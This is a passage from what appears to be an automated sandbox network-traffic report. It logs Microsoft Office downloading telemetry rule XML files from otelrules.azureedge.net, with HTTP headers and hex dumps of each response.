                  x-azure-ref: 20241023T044822Z-15b8d89586fhl2qtatrz3vfkf000000002t000000000gt96
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:22 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  120192.168.2.44986813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:22 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:22 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:22 GMT
                  Content-Type: text/xml
                  Content-Length: 1403
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                  ETag: "0x8DC582BDC2EEE03"
                  x-ms-request-id: a3259b44-001e-0065-2af2-240b73000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044822Z-r197bdfb6b4kkrkjmxpfy2et100000000m4000000000hw8k
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:22 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                  Session IDSource IPSource PortDestination IPDestination Port
                  121192.168.2.44986913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:23 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:23 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:23 GMT
                  Content-Type: text/xml
                  Content-Length: 1366
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                  ETag: "0x8DC582BEA414B16"
                  x-ms-request-id: e014a2e3-501e-0035-060b-22c923000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044823Z-16849878b78rjhv97f3nhawr7s00000005sg000000002bpg
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:23 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                  Session IDSource IPSource PortDestination IPDestination Port
                  122192.168.2.44987013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:23 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:23 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:23 GMT
                  Content-Type: text/xml
                  Content-Length: 1399
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                  ETag: "0x8DC582BE1CC18CD"
                  x-ms-request-id: baa41b4f-401e-00ac-2c28-210a97000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044823Z-16849878b785g992cz2s9gk35c00000005ng00000000nbnm
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:23 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                  Session IDSource IPSource PortDestination IPDestination Port
                  123192.168.2.44987113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:23 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:23 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:23 GMT
                  Content-Type: text/xml
                  Content-Length: 1362
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                  ETag: "0x8DC582BEB256F43"
                  x-ms-request-id: e1e0bfc6-201e-006e-0e0b-22bbe3000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044823Z-16849878b78k46f8kzwxznephs00000005gg00000000n19d
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:23 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  124192.168.2.44987213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:23 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:23 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:23 GMT
                  Content-Type: text/xml
                  Content-Length: 1403
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                  ETag: "0x8DC582BEB866CDB"
                  x-ms-request-id: 8b787db3-c01e-0046-5018-242db9000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044823Z-r197bdfb6b4qpk6v9629ad4b5s0000000a9g00000000b0ue
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:23 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                  Session IDSource IPSource PortDestination IPDestination Port
                  125192.168.2.44987313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:23 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:23 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:23 GMT
                  Content-Type: text/xml
                  Content-Length: 1366
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                  ETag: "0x8DC582BE5B7B174"
                  x-ms-request-id: af610e67-501e-007b-1855-225ba2000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044823Z-16849878b787psctgubawhx7k800000005gg00000000dryn
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:23 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                  Session IDSource IPSource PortDestination IPDestination Port
                  126192.168.2.44987413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:23 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:24 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:23 GMT
                  Content-Type: text/xml
                  Content-Length: 1399
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                  ETag: "0x8DC582BE976026E"
                  x-ms-request-id: 8522a688-a01e-0084-2768-219ccd000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044823Z-16849878b78lhh9t0fb3392enw00000005m000000000c1bt
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:24 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                  Session IDSource IPSource PortDestination IPDestination Port
                  127192.168.2.44987513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:24 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:24 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:24 GMT
                  Content-Type: text/xml
                  Content-Length: 1362
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                  ETag: "0x8DC582BDC13EFEF"
                  x-ms-request-id: efa6dde7-e01e-0071-750c-2208e7000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044824Z-16849878b785f8wh85a0w3ennn00000005pg00000000b5rs
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:24 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  128192.168.2.44987613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:24 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:24 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:24 GMT
                  Content-Type: text/xml
                  Content-Length: 1425
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                  ETag: "0x8DC582BE6BD89A1"
                  x-ms-request-id: ada57496-d01e-005a-4ff2-247fd9000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044824Z-r197bdfb6b49q495mwyebb3r6s00000008p000000000aff7
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:24 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                  Session IDSource IPSource PortDestination IPDestination Port
                  129192.168.2.44987713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:24 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:24 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:24 GMT
                  Content-Type: text/xml
                  Content-Length: 1388
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                  ETag: "0x8DC582BDBD9126E"
                  x-ms-request-id: 474bc074-b01e-0002-67b0-201b8f000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044824Z-16849878b78q7vdcwmryzsh7bg00000005t000000000cg6n
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:24 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                  Session IDSource IPSource PortDestination IPDestination Port
                  130192.168.2.44987813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:24 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:24 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:24 GMT
                  Content-Type: text/xml
                  Content-Length: 1415
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                  ETag: "0x8DC582BE7C66E85"
                  x-ms-request-id: 8b373834-501e-008c-26e4-21cd39000000
